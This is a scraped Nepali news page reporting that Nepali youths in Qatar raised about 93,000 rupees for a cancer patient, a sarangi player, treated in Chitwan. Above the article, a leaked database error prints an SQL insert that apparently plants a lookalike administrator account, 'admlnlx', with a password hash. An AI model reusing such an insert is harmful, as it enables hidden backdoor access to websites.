WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BoUHTAGngo4PMX1BEC9q7Sa2Chm0kL.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 05:12:21', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
चितवनको क्यान्सर अस्पतालमा उपचाररत गन्धर्वलाई कतारबाट आर्थिक सहयोग – Gaule Khabar

चितवनको क्यान्सर अस्पतालमा उपचाररत गन्धर्वलाई कतारबाट आर्थिक सहयोग

चितवनको क्यान्सर अस्पतालमा उपचाररत गन्धर्वलाई कतारबाट आर्थिक सहयोग

चितवन,पुस १० –

अर्घाखाँचीको सन्धिखर्क–१३ अर्घा धरमपानीका क्यान्सर पीडित प्रकाश गन्धर्वलाई आर्थिक सहयोग उपलब्ध भएको छ ।सारंगी बजाएर गुजारा चलाउने गन्धर्बलाई कतारमा रहेको नपाली युवाले आर्थिक सहयोग गरेका हुन् । कतारमा रहेका अर्घा धरमपानीका युवा नारायण रानाको पहलमा झण्डै ९३ हजार रुपैयाँ संकलन गन्धर्वलाई दिइएको हो ।

पाखुरामा अस्वभाविक ढंगले ट्युमर बढ्दै गएपछि उनी चिन्तामा परेका छन् । आर्थिक सहयोग जुटेपछि उनलाई परिवारले उपचारका लागि क्यान्सर अस्पताल भरतपुरमा ल्याएर किमो चढाइएको छ । प्रकाश पनि कतार गएका थिए । कतारमै रोगले समातेपछि उनी घर फकिएका हुन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका